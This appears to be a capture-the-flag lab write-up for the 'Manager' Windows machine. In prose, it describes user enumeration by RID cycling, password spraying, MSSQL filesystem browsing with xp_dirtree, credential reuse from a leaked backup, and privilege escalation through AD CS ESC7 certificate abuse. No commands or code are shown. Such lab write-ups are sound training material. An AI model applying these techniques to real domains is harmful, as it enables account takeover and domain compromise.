Last updated
Last updated
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Nmap Scan
Summary
hosts file
Service Enumeration
HTTP Enumeration
I don't get anything new from fuzzing files and directories from those I find in the website
No many things are in this web app as it seems to be a static website, So I will switch to other services running on this box
SMB & RPC Enumeration
I don't get anything useful permissions on the shares, but I get the users on the domain using rid bruting
Since I don't have any password yet, I will try to brute the password as the user's name and I get a hit
I can brute MSSQL login, too
With valid credentials, I will look at the shared access and MSSQL database. When I looked at the share, I didn't get interesting things here so will move to mssql
And I'm in the database :))
When I deal with mssql, I perform checklist for possible attack paths, So I will create one
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility capture the mssql service account
Check for impersonating other users
Check for trustworthy database
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing commands with xp_cmdshell
With this List, I can move forward and I will use mssqlclient.py built-in commands
Till now, I don't get any possible path and when I even tried to get the hash of the service account, I got the hash of the machine account which is uncrackable
The last thing I can try is check read or write access to the file system. I will use xp_dirtree to list the directories in a path.
With IIS web server running on the box, I can try to read web.config or an important file on its directory inetpub. Here are several interesting files web.config & website-backup-27-07-23-old.zip
When I tried to access the web.config trough web, it gave me file not found.
but when I tried to access the .zip file, It was downloaded
I created a new directory, moved the zip file to it, unzipped it and list the content. there is an odd .xml file
It contain credential for raven user.
These credentials are valid and I have access to Winrm, too :))
User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx
Looking at the account privs and groups, I noticed that he is a member of Certificate Service DCOM Access which means PKI existence
I can confirm with NetExec using ADCS module
When dealing with ADCS, I hurry to enumerate possible ESCALATION (ESC) paths using certipy
Then, I will also use certipy to find vunerable templates or permissions
user raven has Enroll and ManageCA rights which means he can enroll new certificate and edit permission on any template, So I can make it vulnerable to ESC4
The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.
The certificate is present and enabled (Enabled: True). If the SubCA certificate is disabled we should enable it.
Since we have ManageCA rights, we can assign ManageCertificate rights to any account.
Exploitation Path
Enable SubCA template
Grant ManageCertificate rights
Request certificate for SubCA template impersonating administrator
Approve the enrollment request as raven
Access the machine as an administrator
Grant ManageCertificate rights
Confirm the new permission
With the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.
We need to save the requested ID 20, and respond yes to the question: Would you like to save the private key? (y/N). We will need this private key to retrieve the certificate later.
Now I can authenticate as an administrator with the .pfx file
Access the machine
Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx
